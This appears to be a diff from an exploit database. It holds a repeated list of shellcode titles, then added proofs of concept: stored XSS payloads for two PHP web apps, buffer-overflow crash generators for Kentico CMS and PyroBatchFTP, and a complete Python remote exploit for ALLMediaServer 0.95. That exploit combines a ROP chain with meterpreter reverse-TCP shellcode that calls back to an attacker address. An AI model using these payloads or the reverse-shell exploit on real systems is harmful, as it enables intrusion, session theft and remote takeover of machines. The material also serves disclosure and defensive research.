Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)
Windows x86 - Hide Console Window Shellcode (182 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
Linux/x86 - execve /bin/dash Shellcode (30 bytes)

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Read /etc/passwd Shellcode (54 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes)
Windows 10 x64 - Egghunter Shellcode (45 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)
Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Disable ASLR Security Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)
Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)
Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)
Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)
Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
Linux/StrongARM - setuid() Shellcode (20 bytes)
Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)
Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)
Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)
Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)
Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Read /etc/passwd Shellcode (54 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes)
Windows 10 x64 - Egghunter Shellcode (45 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)
Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Disable ASLR Security Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)
Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
Linux/x86-64 - Kill All Processes Shellcode (19 bytes)
Linux/x86-64 - Fork Bomb Shellcode (11 bytes)
Linux/x86 - Fork Bomb Shellcode (9 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)
Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
Linux/x86-64 - Kill All Processes Shellcode (19 bytes)
Linux/x86-64 - Fork Bomb Shellcode (11 bytes)
Linux/x86 - Fork Bomb Shellcode (9 bytes)
Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
Windows x64 - API Hooking Shellcode (117 bytes)
Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
Windows x64 - API Hooking Shellcode (117 bytes)

exploits/php/webapps/43535.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Xnami Image Sharing - Persistent XSS Vulnerability
+# Google Dork: "  Copyright 2017 xnami. " & 2018
+# Date: 11-01-2018
+# Exploit Author: Dennis Veninga
+# Contact Author: d.veninga [at] networking4all.com
+# Vendor Homepage: bizlogicdev.com
+# Version: 1.0
+# CVE-ID: CVE-2018-5370
+
+Xnami facilitates the creation of an image sharing community. This is
+similar in
+functionality to sites like imgur, ImageShack, et al.
+
+BizLogic xnami 1.0 has XSS via the comment parameter in an addComment
+action to the /media/ajax URI.
+
+At any uploaded media there is a comment system where people can post (also
+anonymous).
+The comment system is vulnerable to XSS attacks. Since it's persistent
+and there is an user login interface, it's possible for attackers to
+steal sessions of users and thus admin(s).
+
+---------------------------
+---------------------------
+PoC with mediaId 611 as example:
+
+POST:
+http://{{target}/media/ajax
+
+method: addComment
+comment: "><XSSCODE<
+mediaId 611
+---------------------------
+---------------------------
+
+Evil javascript code can be inserted and will be executed when visiting the
+media.

exploits/php/webapps/43543.txt

@@ -0,0 +1,45 @@
+# # # # #
+# Exploit Title: Taxi Booking Script v1.0 - Cross-site Scripting (XSS)
+
+# Date: 11.01.2018
+# Vendor Homepage: https://www.phpjabbers.com/taxi-booking-script/
+# Software Link: 
+# Demo: http://demo.phpjabbers.com/1515648238_792/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
+# Version: 1.0
+# Category: Webapps
+# Tested on: Windows 10
+# CVE: N/A
+# # # # #
+# Exploit Author: Tauco
+
+Description:
+===========================================================================
+The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site. 
+
+POC:
+
+Exploit code(s):
+===============
+
+Persistent XSS:
+1. user_update=1&id=2&role_id=1&email=admin%40a.com&password=1231231&name=<script>window.location='https://www.google.com/search?q=xss'</script>&phone=123131&status=T
+
+2. booking_update=1&id=3&tab_id=tabs-1&uuid=<script>window.location='https://www.google.com/search?q=xss'</script>&booking_date=11-01-2018 13:06&pickup_address=<script>window.location='https://www.google.com/search?q=xss'</script>&return_address=Santa Fe 1236, Rosario, Santa Fe Province, Argentina&distance=123&fleet_id=1&passengers=1&luggage=1&extra_id[]=1&sub_total=374.40&tax=37.44&total=411.84&deposit=41.18&payment_method=bank&cc_type=&cc_num=&cc_exp_month=&cc_exp_year=&cc_code=&status=cancelled&client_id=5&c_fname=asd&c_lname=asd&c_phone=12&c_email=asda&c_company=dasdasd&c_address=asda&c_city=asdasd&c_state=asdasda&c_zip=1212&c_country=&c_notes=asdad&c_airline_company=adsad&c_flight_number=adsasd&c_flight_time=13:05&c_terminal=1
+
+
+Severity Level:
+=========================================================
+High
+
+
+Description:
+==========================================================
+ 
+ 
+Request Method(s):              [+]  POST & GET
+ 
+ 
+Vulnerable Product:             [+]  Taxi Booking Script v1.0
+ 
+ 
+Vulnerable Parameter(s):        [+]  name, uuid, pickup_address

exploits/windows/dos/43547.txt

@@ -0,0 +1,225 @@
+Document Title:
+===============
+Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=1943
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5282
+
+CVE-ID:
+=======
+CVE-2018-5282
+
+
+Release Date:
+=============
+2018-01-04
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1943
+
+
+Common Vulnerability Scoring System:
+====================================
+6
+
+
+Vulnerability Class:
+====================
+Buffer Overflow
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+Kentico is the only fully integrated ASP.NET CMS, E-commerce, and Online Marketing platform that allows you to create cutting-edge 
+websites and optimize your digital customers’ experiences fully across multiple channels. Kentico saves you time and resources so 
+you can accomplish more. Giving you the power to improve and refine your digital strategy, align it with the needs of your customers, 
+and create unique user experiences, Kentico 9 accelerates customer loyalty through new technologies. 
+
+(Copy of the Homepage: http://www.kentico.com/product/kentico9 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a stack buffer overflow vulnerability in the official Kentico v9.0, v10.0 & v11.0 content management system software.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2018-01-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Kentico Software
+Product: Kentico - Content Management System (eCommerce Software) 9.0
+
+Kentico Software
+Product: Kentico - Content Management System (eCommerce Software) 10.0
+
+Kentico Software
+Product: Kentico - Content Management System (eCommerce Software) 11.0
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local stack buffer overflow vulnerability has been discovered in the official Kentico v9.0, v10.0 & v11.0 content management system software.
+The buffer overflow vulnerability allows local attackers to compromise the local system process by an overwrite of the active registers.
+
+The local buffer overflow vulnerability is located in the `Load XML Configuration` module for file imports. The xml file impact input 
+data of the configuration for the software. In several values of the xml file the inputs are not recognized by an approval of the secure 
+software validation mechanism. The iis configuration settings are connected to a secure validation process, the sql install database 
+information in the xml file are not. The non-exisiting input validation and the unrestricted context size allows local attackers to 
+trigger a stack buffer overflow vulnerability. That results in compromise of the software process with system privileges.
+
+The security risk of the local buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. 
+Exploitation of the stack buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction. 
+Successful exploitation of the vulnerability results in overwrite of the active registers to compromise of the computer system or process.
+
+Vulnerable Module(s):
+[+] Load XML Configuration
+
+
+Proof of Concept (PoC):
+=======================
+The local buffer overflow vulnerability can be exploited by local attackers with low privileged or restricted system user account without user interaction.
+For security demonstration or to reproduce the software vulnerability follow the provided information and steps below to continue the process.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Download the newst software version of the Kentico cms (v9.0.x - 9.0.5981.23486)
+2. Accept the program conditions and click to custom installation
+3. Open the local hosted xml poc file
+4. Include a large unicode payload to the marked values
+5. Save the xml file on your localhost
+6. Move back to the kentico v9.x installation process with the custom install screen
+Note: Attach a debugger to followup with the overwrite on the active registers
+7. Load the xml poc file by usage of the import function of kentico (left|buttom)
+8. The vulnerable values loaded and the process will permanently crash with different exceptions
+9. Move back to the debugger that is attached to the active software process and followup with an overwrite of the active ecx, ebp or eip registers
+10. Successful reproduce of the local buffer overflow vulnerability!
+
+
+PoC: Vulnerable Source (XML)
+<SilentInstall Log="True" LogFile="" OnError="Stop" CheckRequirements="False" ShowProgress="CommandPrompt">
+  <Setup InstallOnlyProgramFiles="False" Location="Local" SetupFolder="C:Program Files (x86)Kentico9.0" NET="4.5" OpenAfterInstall="True" 
+DeleteExisting="False" DoNotOverwriteInstallation="True" RegisterCounters="False" InstallWinServices="False" RegisterApplicationToEventLog="False" 
+WebProject="WebApplication" KillRunningProcesses="False" EnableModuleUsageTracking="True" />
+  <Sql InstallDatabase="True" Server="127.0.0.1" Authentication="SQL" 
+SqlName="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" 
+SqlPswd="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" 
+Database="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" Operation="" Collation="SQL_Latin1_General_CP1_CI_AS" Schema="" DeleteExisting="False" />
+  <IIS Website="" TargetFolder="C:inetpubwwwrootKentico9" DeleteExisting="GetUnique" KillRunningProcesses="False" />
+  <Modules type="InstallAll" />
+  <WebTemplates type="InstallAll" />
+  <UICultures type="InstallAll" />
+  <Dictionaries type="InstallAll" />
+  <WebSites />
+  <Licenses />
+  <Notification Enabled="False" Server="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" 
+UserName="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" 
+Password="[INCLUDE UNICODE PAYLOAD HERE TO TRIGGER THE BOF!]" 
+SSL="False" From="" To="" Subject="" AttachLogFile="True" />
+</SilentInstall>
+
+Note: Start the software exe file kentico v9.0 on windows, attach the windows debugger and load the xml config file to overwrite the ecx and eip registers.
+The installation path and the iis website values are not exploitable, because of the active content restrictions of the process that drops an invalid 
+argument exception to prevent.
+
+
+PoC: Exploit Code (XML)
+<SilentInstall Log="True" LogFile="" OnError="Stop" CheckRequirements="False" ShowProgress="CommandPrompt">
+  <Setup InstallOnlyProgramFiles="False" Location="Local" SetupFolder="C:Program Files (x86)Kentico9.0" NET="4.5" OpenAfterInstall="True" DeleteExisting="False" 
+DoNotOverwriteInstallation="True" RegisterCounters="True" InstallWinServices="True" RegisterApplicationToEventLog="True" 
+WebProject="WebApplication" KillRunningProcesses="True" EnableModuleUsageTracking="True" />
+  <Sql InstallDatabase="True" Server="127.0.0.1" Authentication="SQL" 
+SqlName="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" 
+SqlPswd="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" 
+Database="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" 
+Operation="" Collation="SQL_Latin1_General_CP1_CI_AS" Schema="" DeleteExisting="False" />
+  <IIS Website="" TargetFolder="C:inetpubwwwrootKentico9" DeleteExisting="GetUnique" KillRunningProcesses="False" />
+  <Modules type="InstallAll" />
+  <WebTemplates type="InstallAll" />
+  <UICultures type="InstallAll" />
+  <Dictionaries type="InstallAll" />
+  <WebSites />
+  <Licenses />
+  <Notification Enabled="False" Server="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" UserName="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" Password="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+" SSL="False" From="" To="" Subject="" AttachLogFile="True" />
+</SilentInstall>
+
+
+PoC: Exploitation (Perl)
+#!/usr/bin/perl
+my $Buff = "A" x 3000;
+open(MYFILE,'>>kentico_unicode_payload.txt');
+print MYFILE $Buff;
+close(MYFILE);
+print "PoC (c) Vulnerability-Laboratory";
+
+
+--- PoC Debug Session Logs [WinDBG] ---
+(1522.21ec): Stack buffer overflow - code c0000409
+eax=00000000 ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0
+eip=41004100 esp=00000000 ebp=00000000 iopl=0         nv up ei pl nz na po nc
+cs=001c  ss=0022  ds=0022  es=0022  fs=002c  gs=0000             efl=00000000
+41414141 cc22
+-
+EXCEPTION_RECORD:  ffffffff -- (.exr ffffffffffffffff)
+ExceptionAddress: 41414141
+   ExceptionCode: c0000409 (Stack Buffer Overflow)
+  ExceptionFlags: 00000001
+NumberParameters: 1
+   Parameter[0]: 00000002
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure file size and input character restriction like on the iis scheme website input.
+Parse the full xml file on import and restrict the memory size on imports to prevent further buffer overflow attacks.
+
+
+Security Risk:
+==============
+The security risk of the local stack buffer overflow vulnerability in the kentico cms software is estimated as high. (CVSS 6.0)
+
+
+Credits & Authors:
+==================
+Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
+implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
+case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
+suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
+or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
+websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
+or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
+phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

exploits/windows/dos/43548.txt

@@ -0,0 +1,85 @@
+=============================================
+MGC ALERT 2018-001
+- Original release date: December 22, 2017
+- Last revised:  January 12, 2018
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,5/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)
+
+II. BACKGROUND
+-------------------------
+PyroBatchFTP is a Windows software that lets you exchange files with FTP,
+FTPS or SFTP servers in an automatic and unattended way, using a simple yet
+powerful batch/script language.
+
+III. DESCRIPTION
+-------------------------
+The Enterprise version of PyroBatchFTP is affected by a Local Buffer
+Overflow vulnerability.
+
+The application does not check bounds when reading the file that will
+execute the script, resulting in a classic Buffer Overflow overwriting SEH
+handler.
+
+To exploit the vulnerability only is needed create a local script to
+interact with the application.
+
+IV. PROOF OF CONCEPT
+-------------------------
+
+my $file= "crash.cmd";
+my $junk= "A" x 2052;
+my $nseh = "BBBB";
+my $seh = "CCCC";
+open($FILE,">$file");
+print $FILE $junk.$nseh.$seh;
+close($FILE);
+print "File Created successfully\n";
+
+V. BUSINESS IMPACT
+-------------------------
+Availability compromise can result from these attacks.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+PyroBatchFTP <= 3.18
+
+VII. SOLUTION
+-------------------------
+Vendor release 3.19 version
+http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt
+
+VIII. REFERENCES
+-------------------------
+https://www.emtec.com/pyrobatchftp/index.html
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+December 22, 2017 1: Initial release
+January 12, 2018 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
+December 22, 2017 2: Send to vendor
+January 12, 2018 3: Vendor fix the vulnerability and release a new version
+January 12, 2018 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

exploits/windows/remote/43523.py

@@ -0,0 +1,100 @@
+#!/usr/bin/python
+# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
+# Exploit Author: Mario Kartone Ciccarelli
+# Contact: https://twitter.com/Kartone
+# CVE: CVE-2017-17932
+# Date: 09-01-2018
+# Thanks to PoC: https://www.exploit-db.com/exploits/43406/
+# Software link: http://www.allmediaserver.org/download
+# Version: 0.95
+# Attack: Remote Code Execution
+# Tested on: Windows 7 x64 Ultimate Eng SP1
+#
+
+import sys
+import socket
+import struct
+
+def main():
+
+   def create_rop_chain():
+
+    rop_gadgets = [
+      0x00407f5d,  # POP EAX # RETN [MediaServer.exe]
+      0x00797250,  # ptr to &VirtualAlloc() [IAT MediaServer.exe]
+      0x004061db,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe]
+      0x0053bc02,  # XCHG EAX,ESI # RETN [MediaServer.exe]
+      0x006c71f8,  # POP EBP # RETN [MediaServer.exe]
+      0x00449a05,  # & jmp esp [MediaServer.exe]
+      0x0049bbc4,  # POP EBX # RETN [MediaServer.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x00500b33,  # POP EDX # RETN [MediaServer.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x006b5c67,  # POP ECX # RETN [MediaServer.exe]
+      0x00000040,  # 0x00000040-> ecx
+      0x0042365d,  # POP EDI # RETN [MediaServer.exe]
+      0x006def0d,  # RETN (ROP NOP) [MediaServer.exe]
+      0x0040710f,  # POP EAX # RETN [MediaServer.exe]
+      0x90909090,  # nop
+      0x0068c35c,  # PUSHAD # RETN [MediaServer.exe]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+   rop_chain = create_rop_chain()
+
+   # msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134 lport=4444 -f python
+   shellcode32 =  ""
+   shellcode32 += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+   shellcode32 += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+   shellcode32 += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+   shellcode32 += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+   shellcode32 += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+   shellcode32 += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+   shellcode32 += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+   shellcode32 += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+   shellcode32 += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+   shellcode32 += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+   shellcode32 += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
+   shellcode32 += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
+   shellcode32 += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
+   shellcode32 += "\xff\xd5\x6a\x0a\x68\xc0\xa8\x00\x86\x68\x02\x00\x11"
+   shellcode32 += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
+   shellcode32 += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
+   shellcode32 += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
+   shellcode32 += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
+   shellcode32 += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
+   shellcode32 += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
+   shellcode32 += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
+   shellcode32 += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
+   shellcode32 += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
+   shellcode32 += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
+   shellcode32 += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
+   shellcode32 += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
+
+   # Stack-pivot at 0x0042b356 : {pivot 2052 / 0x804} :  # ADD ESP,800 # POP EBX # RETN    ** [MediaServer.exe] **   |  startnull {PAGE_EXECUTE_READ}
+
+   size = 3000
+   seh_offset = 1072
+   sp_offset = 548
+
+   buffer  = ""
+   buffer += "A" * sp_offset
+   buffer += rop_chain
+   buffer += "\xe9\xcb\x01\x00\x00" # JMP $1d0
+   buffer += "A" * (seh_offset - len(buffer))
+   buffer += "\xff\xff\xff\xff" # NSEH record
+   buffer += struct.pack('<L', 0x0042b356 ) # Stackpivot on SEH record
+   buffer += shellcode32
+   buffer += "B" * (size - len(buffer))
+
+   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+   s.connect((sys.argv[1], 888))
+   print "[+] AllMediaServer 0.95 Stack Buffer Overflow Exploit"
+   print "[+] Sending evil payload to " + sys.argv[1] + "..."
+   s.send(buffer)
+   s.close()
+
+
+if __name__ == '__main__':
+
+   main()